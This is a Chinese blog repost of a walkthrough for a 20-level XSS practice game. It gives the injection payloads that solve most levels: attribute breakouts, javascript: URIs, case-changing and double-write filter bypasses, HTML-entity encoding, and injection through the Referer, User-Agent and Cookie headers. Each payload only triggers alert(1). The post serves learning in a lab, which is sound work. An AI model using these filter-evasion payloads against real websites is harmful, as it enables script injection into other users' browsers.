xss games20关小游戏附源代码

最新推荐文章于 2024-09-23 23:39:34 发布
最新推荐文章于 2024-09-23 23:39:34 发布
阅读量650 收藏 2
点赞数
文章标签: 游戏 javascript ViewUI
原文链接:http://www.cnblogs.com/zaqzzz/p/9434388.html
版权

1.

1397720-20180807003301956-648566404.png

get方式的的值直接输出来了。

?name=<script>alert(1)</script>

2.

1397720-20180807003314940-639956145.png

同样没有过滤,不过需要闭合前边的双引号和>。
"><script>alert(1)</script>

3.

1397720-20180807003324725-1848257252.png

1397720-20180807003335151-1282134212.png

用htmlspecialchar函数对输入的值做了一个过滤。这个函数过滤 < > " & '但是他这个也存在过滤方法

w3c上的。很明显,他这里没有加ENT_QUOTES,是默认的形式,所以不过滤单引号。另外绕过<>的过滤,就用onXX事件,这里我用onclick。
' onclick=alert(1)//

4.

1397720-20180807003344139-713588049.png

只是过滤了<>,比上一关还简单 。

" onclick=alert(1)//

5.

1397720-20180807004252443-1786078067.png

<script过滤为<scr_ipt,on过滤为o_n,我们可以考虑javascript伪协议。过滤的是<script,script是不会被过滤的。

"><a href=javascript:alert(1)>111</a>

6.

1397720-20180807003402617-180621913.png

过滤了<script,on,src,data,href。看起来是没有办法,但是他这里忘了对get方式得到的keyword的值进行小写的函数,所以,大小写绕过。

" oNclick=alert(1)//

7.

1397720-20180807004312387-754116061.png

仔细观察过滤的函数,与前边过滤不用的是,他是把敏感的字符替换为空,而且是替换一次。 双写绕过。
"><a hrhrefef=javascrscriptipt:alert(1)>111</a>
注意观察href和script哦。

8.

1397720-20180807004323252-860474166.png

href都给你写好了。直接javascript,但是要注意script这里过滤了,但是javascript可以进行html编码,注意不能是url编码哟,这样url解析器会识别不出来什么协议。还有就是对script之间的一个或多个单词编码。

javasc&#x72;ipt:alert(1)

9.

1397720-20180807003431224-1026270155.png

和上一关基本一样,可是你输入中必须有http://,直接把这个http://写这是后边。这样,http://不但出现在了你输入的字符串里,而且被注释掉了不起任何作用

javasc&#x72;ipt:alert(1)//http://

10.

1397720-20180807003441990-1360713699.png

他这里有两个get可以得到的参数的值,keyword可以得到,但是代码中并没有有关keyword得到的值的输出。看代码,还可以用t_sort得到值,我们可以构造script的方式来让他产生弹框。构造:"><script>alert(1)<script><" (注意前后的闭合) 。但是这里过滤掉了<>,所有考虑onclick事件,值得注意的是:input的type属性不是text,而是hidden,这意味我们不能通过点击输入框来让他弹框。所以我们还有加一条type="text",然后注释掉type=hiden。

t_sort=" onclick=alert(1) type=text//

11.

1397720-20180807004351399-1653683544.png

和上一题一个思路,只不过注入点到了http_reference,抓包,修改Referer的值

Referer: " onclick=alert(1) type=text//

12.

1397720-20180807004407135-1111273488.png

抓包修改user-angent的值

User-Agent:" onclick=alert(1) type=text//

13.

抓包修改cookie的值,user=不要删除了哟

1397720-20180807003504979-2145453348.png

Cookie: user=" onclick=alert(1) type=text//

14.

没看懂。。。

15.

也不会

16.

1397720-20180807003516735-637452394.png

过滤了空格,script,/。我们可以想到用回车或者换行的html编码来绕过。%0a,%0d。
这里讲一下为什么要过滤/,因为他不想让你用必须闭合的标签。比如<a href></a>,这里过滤/这种就不能用了。但是我根据写html的经验,<a>位于<center></center>中,就算没有</a>他也能够创造链接(这里不影响到其他的内容),并且成功执行。这里,我就偏用<a href>.
然后我对javascript的某个字符编码,从而绕过script的过滤。对R编码。->&#x72;->%26%23x72%3B
为什么要进行编码?&#都比较特殊,一开始浏览器不会对他进行编码,而#有截断的功能,所以浏览器压根收不到后边的内容,但实现进行url编码,浏览器要先显示这些字符的时候url解码,就完美地还原出&#这符号了,你看第八关为什么可以直接&#x72;我也不是很清楚,做了个小实验:
1397720-20180807213735645-872124534.png

输入&#72;get方式那里会自动给他编码,可能提交的方式,或者其他的形式不同吧。
?keyword=<a%0Ahref=javasc%26%23%78%37%32%3Bipt:alert(1)>a

下载链接:https://files.cnblogs.com/files/Eleven-Liu/xss练习小游戏.zip

转载于:https://www.cnblogs.com/zaqzzz/p/9434388.html

weixin_30809333
关注
Android资源代码 源码 整理 Github开源项目下载地址
wengsheng147的专栏
03-26 5670
第一部分 个性化控件(View) 主要介绍那些不错个性化的View,包括ListView、ActionBar、Menu、ViewPager、Gallery、GridView、ImageView、ProgressBar、TextView、ScrollView、TimeView、TipView、FlipView、ColorPickView、GraphView、UI Style等等。 一、L
整理的Android资源代码 源码 整理 Github开源项目下载地址
源码分享的博客
11-02 9184
主要介绍那些不错个性化的View,捡代码论坛整理提供。包括ListView、ActionBar、Menu、ViewPager、Gallery、GridView、ImageView、ProgressBar、TextView、ScrollView、TimeView、TipView、FlipView、ColorPickView、GraphView、UI Style等等。手机游戏源码,网站源码,棋牌游戏源码,IT视频教程,应用程序源码。整理的Android资源代码 源码 整理 Github开源项目下载地址
XSS20练习源码
09-04
包含20XSS练习的源码。文件都为PHP类型,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习。
xss游戏平台源码
12-12
xss游戏平台源码
xss源码小游戏.rar
07-09
xss代码小游戏,你值得拥有,简单粗暴,带你学会xss,非常适合初学者.
xss小游戏
weixin_44110913的博客
03-01 738
<p></p><p>最近发现一个有趣的XSS小游戏游戏的作者是先知社区的大佬@Mramydnei,喜欢XSS的大家可以一起来学习交流。</p> 现在我把自己在前面的十八里面的闯过程记录一下,大神绕行,我是菜鸟,大家可以一起学习,互相进步成长。 第一,没有任何疑问,简单的不能再简单,没有任何过滤 输入点...
xss小游戏.zip
02-25
这是一款利用xss漏洞闯小游戏,无需连接数据库,共20,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
Android开源代码汇总
tangyeegg的博客
06-27 2205
第一部分 个性化控件(View) 主要介绍那些不错个性化的View,包括ListView、ActionBar、Menu、ViewPager、Gallery、GridView、ImageView、ProgressBar、TextView、ScrollView、TimeView、TipView、FlipView、ColorPickView、GraphView、UI Style等等。 、其他 一、
Android开源经典项目
Tamic (大白)
09-13 5758
Android开源项目大全,包括经典个人博客,组织和开源项目
219-6-3Google浏览器书签备份
qq_43046057的博客
06-03 3602
WAF 创建时间 2019-03-11 12:45:27 最后修改 2019-04-03 14:02:50>> 书签名称 链接 添加时间 WEB漏洞测试(二)——HTML注入 & XSS攻击 - CSDN博客 http://www.secsky.cn/216.html 2018-05-15 10:45:24 ModSecurity介绍 - CSDN博客...
XSS-GAME小游戏
weixin_43296565的博客
09-14 184
查看源代码,没有任何过滤,直接输入,弹框进入下一
Xss小游戏攻略带解释
sirius的博客
08-28 5538
Xss小游戏攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一。 第一:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
XSS小游戏(level1~13)
qq_43381463的博客
02-04 490
XSS小游戏(level1~13)
XSS学习之xss20
记录一些有用的东西
12-12 2928
前言 这是比较简单的xss练习小游戏,非常适合入门。一直以来,对xss的内容总感觉有一些屏障,应该是因为动手实践太少。所以,趁此机会,好好学习一番,打好基础,以后再继续深入。 xss 1.概念:XSS攻击全称跨站脚本攻击(Cross-Site Scripting,XSS)是一种经常出现在 WEB 应用程序中的计算机安全漏洞。其是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取 Cook
XSS小游戏(前13
最新发布
w2vmany的博客
09-23 667
1.存在可控参数2.页面存在回显3.使用带有特殊字符的语句去测试,网站是否进行了实例化 ( 例如 '">123 )4.构造闭合,实现payload的逃逸。
XSS-通小游戏(1-20)
热门推荐
→_→
05-28 1万+
在玩游戏之前先简单的了解下,什么是XSS? 1.什么是xss XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 2.xss原理 (1).攻击者对某含有漏洞的服务器发起XSS攻击(注入JS代码) (2)诱使受害者打开受到攻击的服务器URL(邮件、留言等,此步骤可选项) (3)受害者在Web浏览
XSS-过小游戏(1-9)
qq_45791294的博客
03-27 260
触发alert()完成卡。 1. <script>alert()</script> 2. 先测试一下 ctrl + u 查看源代码 观察第17行,闭合第17行即可插入alert "><script>alert()</script> 3. 测试,查看源代码 'onclick = 'alert() onclick:当按钮被点击时执行Javascript代码,这里是为输入框加了onclick,所以访问之后需要点击一
xss靶场练习(二)之xss小游戏
angry_program的博客
02-13 2816
前言 话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。 xss小游戏在线地址:http://test.ctf8.com/ xss小游戏一共二十。 为了方便, 我把项目copy在本地。 为了方便实战效果和理解, 本文采用先通再展示源码的排版方式。 Leve-1 有一个参数name: 再看看name在html源...
xss小游戏1-20,详细攻略(level14,level19详解)
jhfjdf的博客
07-14 3244
XSS小游戏攻略 level1 直接修改name参数的值为: <script>alert(1)</script> 解释:利用<script>标签下的alert()弹窗 level2 尝试使用level1的: <script>alert(1)</script> 查看网页源代码: 很明显,level2卡的值被传到了value里 尝试使用 " onmouseover='alert(1)' 闭合vlaue的双引号 level3 尝试
VB源代码实现密码运算小程序
VB源代码通常具有以下特性: - 事件驱动:程序的执行流程由用户的操作(如点击按钮、输入信息等)触发。 - 图形用户界面:VB程序通常具有丰富的图形界面,使得用户交互更加直观和友好。 - 程序调试:开发者可以在IDE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值